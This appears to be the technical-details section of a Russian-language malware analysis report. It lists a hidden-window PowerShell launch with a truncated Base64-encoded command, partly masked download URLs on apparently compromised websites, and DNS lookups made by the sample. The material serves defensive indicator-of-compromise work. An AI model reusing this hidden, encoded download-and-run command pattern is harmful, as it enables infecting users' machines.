Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABZAGIAbwBjAGYAdQBzAHAAPQAnAE8AdwBwAHUAdAB3AHgAYgAnADsAJABCAHYAbQB5AHkAZwBlAHgAIAA9ACAAJwA1ADEAMgAnADsAJABaAGIAZwBiAHUAcQB3AHgAYwBjAG4AdgBzAD0AJwBGAHMAZQBnAHUAZQBuAGoAbQAnADsAJAB...
- http://sa####tafashion.com/wp-content/SOFrFZ/
- http://pr#####.pinkermoda.com/banners/lLBzzHBU/
- DNS ASK sa####tafashion.com
- DNS ASK pr#####.pinkermoda.com
- DNS ASK dm#.waw.pl
- DNS ASK te####ffee.edu.vn
- DNS ASK wu######.000webhostapp.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABZAGIAbwBjAGYAdQBzAHAAPQAnAE8AdwBwAHUAdAB3AHgAYgAnADsAJABCAHYAbQB5AHkAZwBlAHgAIAA9ACAAJwA1ADEAMgAnADsAJABaAGIAZwBiAHUAcQB3AHgAYwBjAG4AdgBzAD0AJwBGAHMAZQBnAHUAZQBuAGoAbQAnADsAJAB...' (со скрытым окном)